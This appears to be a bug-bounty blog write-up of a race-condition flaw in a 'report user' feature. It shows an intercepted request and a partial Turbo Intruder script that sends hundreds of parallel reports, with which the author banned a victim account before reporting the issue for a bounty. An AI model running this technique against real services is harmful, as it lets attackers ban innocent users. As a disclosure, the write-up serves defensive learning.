banning users Race condition

What is race condition ?

Multiple resources trying to access same resource.

example: you are booking a train ticket online and only a single seat ( assume seat no:5 ) is there. now you book a ticket for that seat and at the same time some other person from the different locations also booking the same seat, same time and you both booked the same seat ( seat no:5 ) and got seat booked for both you and other people this kind of issue is called a race condition. when multiple resources are trying to access the same resource at the same time.


As this was a private program all illustrations of vulnerabilities will be represented with the host as

The application has a feature to report any person as inappropriate but you can report a person only one time.

to ban any user at-least 100 plus reports must be made as inappropriate so let’s try rate limit but failed.


visit the user account and click on report

intercept the request and send this to turbo intruder ( plugin by @albinowax )

HTTP request

POST /user/victim HTTP/1.1
Host: example
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Content-Type: application/json;charset=utf-8
Content-Length: 22
Connection: keep-alive
{ json data }

turbo intruder script

def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
for i in range(30):
engine.queue(target.req, target.baseInput,
def handleResponse(req, interesting):

and click on the attack once I send this I noticed that there are 20 — > 200 OKAY requests.

so I increased the range from 30 to 300 and I was able to send more than 100 plus report requests to the server and after 3 to 4 hrs of wait, the victim account was banned.

Reported –> Accepted –> P3 –> $dollar

2 replies on “banning users Race condition”

to ban any user you need to have (assume 100 reports ) against the account. and all the reports made should be from the different account but the developer was not checking whether the report was made from the same account or different account since they have have applied rate limit and thought there is no way to bypass it

Leave a Reply

Your email address will not be published. Required fields are marked *